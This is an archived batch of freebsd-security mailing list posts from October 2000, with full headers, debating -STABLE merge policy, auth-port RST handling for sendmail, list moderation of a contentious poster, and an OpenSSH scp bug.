Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:51:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 75C2737B503; Tue, 3 Oct 2000 10:51:37 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id NAA91193; Tue, 3 Oct 2000 13:51:23 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Tue, 3 Oct 2000 13:51:23 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Christopher Masto Cc: Warner Losh , Paul Richards , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: <20001003124008.A4892@netmonger.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Christopher Masto wrote: > The problem with being too cautious is that stable becomes unusable > and people who shouldn't be running current start moving to it because > stable doesn't support their new laptop. > > I think it's important to push _some_ features into stable. Having to > wait several years for the next major "point-oh" release of FreeBSD > (which comes with "point-oh fear" holding it back) is not the best > way to do things. IMO. There's a place between these two extremes > of paranoia and wild abandon, and I think that's where the MFCs should > take place. There's certainly a middle ground, and we can't expect that it will necessarily keep everyone happy, but that middle ground would hopefully avoid the current situation. Time-testing of features, as well as peer review, are both extremely important aspects of stable and secure development. Several times over the last few months, we've seen things merged into -STABLE leaving it in an ususable state for days at a time. This is clearly not desirable. Similarly, we've seen things added to both -CURRENT and -STABLE without substantial review in advance of the commit. No one is questioning the qualifications of our committers, but I think it's the case that, in general, no single committer should rely on only their own review of code: a second pair of eyes goes a long way, and there's nothing like a few weeks of being burned in before backporting a change to -STABLE. It would be unfair of us to expect every line of code that is written to be perfect, but it is fair of us to expect that code be carefully reviewed for inclusion before it gets included in the release version of software deployed on hundreds of thousands of machines. We should be equally careful about changes in -CURRENT, of course, as -CURRENT has a nasty habit if becoming -STABLE every year or two :-). The FreeBSD development process is constantly evolving: expectations of high quality play an important role in that evolution. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:53: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with ESMTP id 94E8437B502 for ; Tue, 3 Oct 2000 10:52:59 -0700 (PDT) Subject: Re: politeness To: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.2a November 23, 1999 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Tue, 3 Oct 2000 12:54:34 -0500 X-MIMETrack: Serialize by Router on MCSMTP/VUMC/Vanderbilt(Release 5.0.3 |March 21, 2000) at 10/03/2000 12:51:12 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The measure of a free society is tolerance for speech which you abhor. Please desist in this nonsense, filter your inbox, not the group. George To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 1: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id BF94637B502; Tue, 3 Oct 2000 11:01:00 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e93I0vM10571; Tue, 3 Oct 2000 12:00:58 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA27859; Tue, 3 Oct 2000 12:00:57 -0600 (MDT) Message-Id: <200010031800.MAA27859@harmony.village.org> To: Paul Richards Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 18:32:28 BST." <39DA182C.C70ED553@originative.co.uk> References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> Date: Tue, 03 Oct 2000 12:00:57 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39DA182C.C70ED553@originative.co.uk> Paul Richards writes: : I think we should have a stable release team, that changes to the stable : branch should be gated through to ensure they're thouroughly tested and : that there's a need for them to be backported. I'd be happy to work with : anyone else who wants to volunteer to do that since maintaining a stable : version of the OS is a major issue for me with my new hat on. I'd support this strongly, both as Warner Losh, Committer and as Warner Losh, Security Officer. My current job uses -stable and needs to have it be sane at "all"[*] times, or we waste a lot of effort bringing in and backing out unstable versions (we do some sanity testing before bringing a version in, but there's only so much you can do). I'd be able to work on this on an irregular basis depending on how saturated I am at work. Warner [*] All == most of the time, maybe with a few short wiwndows from time to time when we prove that humans are maintaining stable. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 6: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id C6E7B37B502 for ; Tue, 3 Oct 2000 11:05:59 -0700 (PDT) Received: (qmail 33882 invoked by uid 1000); 3 Oct 2000 18:07:08 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Oct 2000 18:07:08 -0000 Date: Tue, 3 Oct 2000 13:07:08 -0500 (CDT) From: Mike Silbersack To: Garrett Wollman Cc: David Pick , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Garrett Wollman wrote: > < said: > > > gets no response (after a time-out) it would be entitled to retry a > > few times in case of packet loss. *But* if it gets a RST, which is a > > If net.inet.tcp.blackhole is set, an RST will not be emitted. > > -GAWollman If you're paranoid enough to block RST, you probably wouldn't leave auth on anyway. In either case, blocked RST wasn't the questioned case. I'm still curious what sendmail does on refused connections. Does anyone know for sure? Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 8: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 56A1A37B66C for ; Tue, 3 Oct 2000 11:08:00 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (3991 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 3 Oct 2000 12:56:39 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 3 Oct 2000 12:56:35 -0500 (CDT) From: James Wyatt To: Poul-Henning Kamp Cc: Brett Glass , Wes Peters , security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: <49242.970591720@critter> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Poul-Henning Kamp wrote: > In message <4.3.2.7.2.20001003103503.04c68240@localhost>, Brett Glass writes: > >At 03:53 AM 10/3/2000, Wes Peters wrote: > > > >>> Everyone has a right to write to the list and share his thoughts. > >> > >>No, the list has a charter. This is a republic, not a democracy. > > > >Does that mean that to get something posted to the list, I need to > >contact my representative, who doesn't respond to me because > >I'm not a member of his political party? Or has a staffer send me > >back a boilerplate form letter and then does what his large > >corporate contributors want? ;-) Actually, I thought this was a pretty funny reply, having tried to contact my reps before. Unfortunately, someone with an axe to grind replied. 8{( > In your particular case: If you want to avoid being banned and > filtered: Yes, it means that. I smell something rotten in Denmark. No first amendment there, I guess. > In all my time in core, nobody even closely rivals your uncontested > number one ranking as the person most people want banned & filtered > from our lists. > > Depending on your luck, or lack of it, the core team may finally > have had it with freedom, liberty and equality in your particular > case, if you don't learn to control your emails style and quantity > pretty damn fast. More fascist control-speak? This sounds more and more like "I've been here forever so I know better and everyone agrees with me, so we're about to cut you off". Some of us have just been here for years, not "forever" and don't believe Brett should die or be filtered on the mailing list. If you feel he should be filtered, add him to your own filter, not ours. Does one person speak for the core team? (Besides Jordan... 8{) Please tell me that I'm over- or misinterpretting you Paul. > Doesn't the fact that your are universally more unpopular than anybody > else with the FreeBSD developers trigger any kind of thought process > in you ? Doesn't it make just a tiny little bit of doubt rear its > ugly head, questioning your approach when you communicate on our lists? He's popular, but some of his assertions aren't. (^_^) His posts sometimes have folks like myself asking for real facts as to what's wrong, but some folks just seem to go into orbit. The "Please die" message was truly a prime example of such junk emitters. It added *nothing*, but let me know more about the personality of the responder than I wanted to know. What next, IP attacks on his machines? Pedophile references? Geez, folks... I know some of the threads are long, but I blame the repliers as much as Brett for that. Most seem to begin with serious problems or questions that matter to us all. Sometimes more homework should be done beforehand, but sometimes we should all take the last line of your .sig to heart. Go back and read the original post - does it warrant all this tripe. (mine or others? If folks *must* reply to this, can we all just sit on our hands for a while afterward and go on to another thread some time? - Jy@ > -- > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 [ ... ] > Never attribute to malice what can adequately be explained by incompetence. -- James Wyatt | Programming since the HP55/65 came out. R/W Systems | Human since birth. FreeBSD for a few years. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 8: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id D04C537B66D for ; Tue, 3 Oct 2000 11:08:03 -0700 (PDT) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 13gWTt-0002rU-00 for security@freebsd.org; Tue, 03 Oct 2000 19:07:57 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) for security@FreeBSD.ORG id 13gWTu-0006gD-00; Tue, 3 Oct 2000 19:07:58 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-reply-to: Your message of "Tue, 03 Oct 2000 13:22:27 EDT." <200010031722.NAA41823@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Oct 2000 19:07:58 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lyndon Nerenberg commented: > David> Sorry, I don't get this. If sendmail attempts to call the > David> "auth" port on the sending machine and gets a response it > David> should be happy. If it gets no response (after a time-out) > David> it would be entitled to retry a few times in case of packet > David> loss. > > No it wouldn't. TCP takes care of the retries for you. True. > If the auth > service is blocked by a firewall the firewall will usually eat the SYN > packets, and you will never get a RST. Unless you've told the firewall package to generate one. Both IPFW and IPFILTER can be told to do this these days. Garrett Wollman commented: > < said: > > > gets no response (after a time-out) it would be entitled to retry a > > few times in case of packet loss. *But* if it gets a RST, which is a > > If net.inet.tcp.blackhole is set, an RST will not be emitted. True. Unless the RST is coming from IPFW or IPFILTER rules. They tend to the way I run my machines. But I had forgotten that variable. So, getting back to the original discussion, What we want to make sure is that sendmail is not unnecessarily delayed. (And "exim" which does the same thing.) So we need to make sure that either: - an "auth" daemon is running (or built in to "inetd" or whatever) - an "auth" daemon is not running and a RST packet is returned regardless of the setting og "net.inet.blackhole" The first option may give away too much information. The second slightly defeats the objective of the "blackhole" option. But, if we *really* care it would be possible to arrange one or the other of the "firewall" packages to generate a RST response to "auth" queries *if the query was received from a machine we "know" about, but not from other machines*. The precise definition of "know" is more problematical. The "best" would be: a machine to which we have a connection open and IPFilter might be enhancable to do this provided we used the "keep state" options on outward connections. If we sent all outgoing mail to a "smart host" then that would be a candidate for being told there is no "auth" data available rather than being told nothing at all. And there's always the option of giving real data to only the questioners we "know" about. But is'a all a lot of work, and I wonder if it's worth it. As far as I can see it's only a problem if the RSTs don't happen for one reason or another. And my original comment still applies. I don't see why a RST *that gets sent* should cause any more delay than an "accept and here's the data". -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11:20:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 15C0C37B502 for ; Tue, 3 Oct 2000 11:20:37 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 0C9761C77; Tue, 3 Oct 2000 14:20:36 -0400 (EDT) Date: Tue, 3 Oct 2000 14:20:36 -0400 From: Bill Fumerola To: James Wyatt Cc: Poul-Henning Kamp , Brett Glass , Wes Peters , security@FreeBSD.ORG Subject: Re: politeness Message-ID: <20001003142035.Z38472@jade.chc-chimes.com> References: <49242.970591720@critter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from jwyatt@rwsystems.net on Tue, Oct 03, 2000 at 12:56:35PM -0500 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 12:56:35PM -0500, James Wyatt wrote: > I smell something rotten in Denmark. No first amendment there, I guess. Thankfully, the US constitution doesn't apply to the FreeBSD mailing lists. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11:24:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id 6DE6737B503 for ; Tue, 3 Oct 2000 11:24:30 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e93IN6N50496; Tue, 3 Oct 2000 20:23:06 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: James Wyatt Cc: Brett Glass , Wes Peters , security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: Your message of "Tue, 03 Oct 2000 12:56:35 CDT." Date: Tue, 03 Oct 2000 20:23:06 +0200 Message-ID: <50494.970597386@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> Depending on your luck, or lack of it, the core team may finally >> have had it with freedom, liberty and equality in your particular >> case, if you don't learn to control your emails style and quantity >> pretty damn fast. > >More fascist control-speak? A mere statement of facts. Neither any single person, nor any single persons civil rights will ever be more important than the FreeBSD project as such. If suffcient many Well Known Developers complain to core asking for Brett to be "banned or else...", he will be banned because his net contribution to the project would rapidly go negative otherwise. I personally think that Brett is one of the people who are a very good argument for a 5 day waiting period before you can send an email. But I will not vote for banning/filtering him because of that, nor will I because my perception is that he is an alarmist sensationalist who can't think a straight thought for 5 minutes. I will vote to ban/filter him (or anybody else) to protect the project and its resources the first instant it becomes necessary. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11:40:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id CE16637B502; Tue, 3 Oct 2000 11:40:20 -0700 (PDT) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.0/8.11.0) with ESMTP id e93Ibqa51317; Tue, 3 Oct 2000 19:37:52 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.1/8.11.0) with ESMTP id e93IZBn44696; Tue, 3 Oct 2000 19:35:11 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200010031835.e93IZBn44696@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: Paul Richards Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: Message from Paul Richards of "Tue, 03 Oct 2000 18:32:28 BST." <39DA182C.C70ED553@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Oct 2000 19:35:11 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I think we should have a stable release team, that changes to the stable > branch should be gated through to ensure they're thouroughly tested and > that there's a need for them to be backported. I'd be happy to work with > anyone else who wants to volunteer to do that since maintaining a stable > version of the OS is a major issue for me with my new hat on. I'd be willing to be part of such a team. > Paul Richards > FreeBSD Services Ltd -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11:50:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from area51.v-wave.com (area51.v-wave.com [24.108.52.213]) by hub.freebsd.org (Postfix) with SMTP id 7D25C37B502 for ; Tue, 3 Oct 2000 11:50:15 -0700 (PDT) Received: (qmail 81965 invoked by uid 1001); 3 Oct 2000 18:50:25 -0000 Date: Tue, 3 Oct 2000 12:50:25 -0600 From: Chris Wasser To: freebsd-security@FreeBSD.ORG Subject: Re: politeness Message-ID: <20001003125025.A81873@area51.v-wave.com> References: <50494.970597386@critter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <50494.970597386@critter>; from phk@critter.freebsd.dk on Tue, Oct 03, 2000 at 08:23:06PM +0200 X-Operating-System: FreeBSD 4.1.1-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 08:23:06PM +0200, Poul-Henning Kamp wrote: > Neither any single person, nor any single persons civil rights > will ever be more important than the FreeBSD project as such. > ...blah blah blah This is understandable. Sometime we are forced to work with people we may not get along with, this is how life works. It surprises me that the core team would degrade into a school-yard fight over the actions of one person, isn't this what happened to NetBSD/OpenBSD? Are we headed along that road now? I would certainly be annoyed if there was some sort of Holy Purification involved in the mailing lists, everyone has an opinion, good or bad, and deserves to be heard. 'man 1 procmail' if you're all bothered by his comments, filter him out rather then ostracizing him. I should know better not to even bother replying because it continues the issue onwards, but hey, liberty is great. Just my two cents. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11:56:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id E820537B503 for ; Tue, 3 Oct 2000 11:56:05 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e93Iu1N50785; Tue, 3 Oct 2000 20:56:01 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Chris Wasser Cc: freebsd-security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: Your message of "Tue, 03 Oct 2000 12:50:25 MDT." <20001003125025.A81873@area51.v-wave.com> Date: Tue, 03 Oct 2000 20:56:01 +0200 Message-ID: <50783.970599361@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001003125025.A81873@area51.v-wave.com>, Chris Wasser writes: >On Tue, Oct 03, 2000 at 08:23:06PM +0200, Poul-Henning Kamp wrote: >> Neither any single person, nor any single persons civil rights >> will ever be more important than the FreeBSD project as such. >> ...blah blah blah > >This is understandable. > >Sometime we are forced to work with people we may not get along >with, this is how life works. It surprises me that the core team >would degrade into a school-yard fight over the actions of one >person, isn't this what happened to NetBSD/OpenBSD? Are we headed >along that road now? You misunderstand me: Until now the core team have resisted calls for Brett to be banned&filtered. What I'm saying is that core wont be able to resist forever if Brett doesn't grab one or more clues of the many handed to him. This is not about core wanting to ban/filter Brett, this is about Brett having annoyed enough people that core soon wont have a choice in the matter... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 12: 0:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id E956037B503; Tue, 3 Oct 2000 12:00:22 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id NAA20714; Tue, 3 Oct 2000 13:00:01 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003125150.04c7f3f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 12:59:54 -0600 To: Warner Losh , Paul Richards From: Brett Glass Subject: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c] Cc: cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <200010031800.MAA27859@harmony.village.org> References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:00 PM 10/3/2000, Warner Losh wrote: >I'd support this strongly, both as Warner Losh, Committer and as >Warner Losh, Security Officer. My current job uses -stable and needs >to have it be sane at "all"[*] times, or we waste a lot of effort >bringing in and backing out unstable versions (we do some sanity >testing before bringing a version in, but there's only so much you can >do). > >I'd be able to work on this on an irregular basis depending on how >saturated I am at work. I'd be glad to help. As someone in a similar position (I *cannot* adopt a branch for use on production servers before the .2 release), I've always been a strong advocate of keeping -STABLE patched against newly discovered problems. When you think about it, it should not be surprising that a growing number of users want this. If folks are running -STABLE on production servers because they want rock-solid performance, they certainly will also care about having security holes patched in a timely way. After all, they don't want those mission-critical machines to be cracked. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 12: 8: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id D76A137B66C for ; Tue, 3 Oct 2000 12:08:02 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (1070 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 3 Oct 2000 13:54:57 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 3 Oct 2000 13:54:52 -0500 (CDT) From: James Wyatt To: Bill Fumerola Cc: Poul-Henning Kamp , Brett Glass , Wes Peters , security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: <20001003142035.Z38472@jade.chc-chimes.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Bill Fumerola wrote: > On Tue, Oct 03, 2000 at 12:56:35PM -0500, James Wyatt wrote: > > > I smell something rotten in Denmark. No first amendment there, I guess. > > Thankfully, the US constitution doesn't apply to the FreeBSD mailing lists. Unfortunately, neither does The Golden Rule from what I've seen lately. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 12:16:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 9590137B66C for ; Tue, 3 Oct 2000 12:16:10 -0700 (PDT) Received: (qmail 475 invoked by uid 0); 3 Oct 2000 19:16:08 -0000 Received: from p3ee21610.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.16) by mail.gmx.net with SMTP; 3 Oct 2000 19:16:08 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id PAA03455 for freebsd-security@freebsd.org; Tue, 3 Oct 2000 15:39:46 +0200 Date: Tue, 3 Oct 2000 15:39:46 +0200 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: OpenSSH Message-ID: <20001003153946.C31338@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from roman@xpert.com on Tue, Oct 03, 2000 at 01:55:34PM +0300 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 13:55 +0300, Roman Shterenzon wrote: > Hello all, > I'm going through weekly BSD security digest: > http://securityportal.com/topnews/weekly/bsd20001002.html > > What is that OpenSSH bug they're talking about? Does anyone > know of a workaround? I guess (haven't read the above doc) it's about the BugTraq thread discussed with the "scp file transfer hole" subject (turning out to be an rcp heritage). List archives are at securityfocus.com. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 12:22:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 2390137B502; Tue, 3 Oct 2000 12:22:42 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id MAA03298; Tue, 3 Oct 2000 12:22:29 -0700 (PDT) (envelope-from obrien) Date: Tue, 3 Oct 2000 12:22:29 -0700 From: "David O'Brien" To: Paul Richards Cc: Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003122229.A3076@dragon.nuxi.com> Reply-To: obrien@FreeBSD.org References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <39D98B55.126DAFC4@originative.co.uk>; from paul@originative.co.uk on Tue, Oct 03, 2000 at 08:31:33AM +0100 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 08:31:33AM +0100, Paul Richards wrote: > I think we push too many enhancements from current to stable, when we > should really only push bug fixes onto the stable branch. I totally disagree. 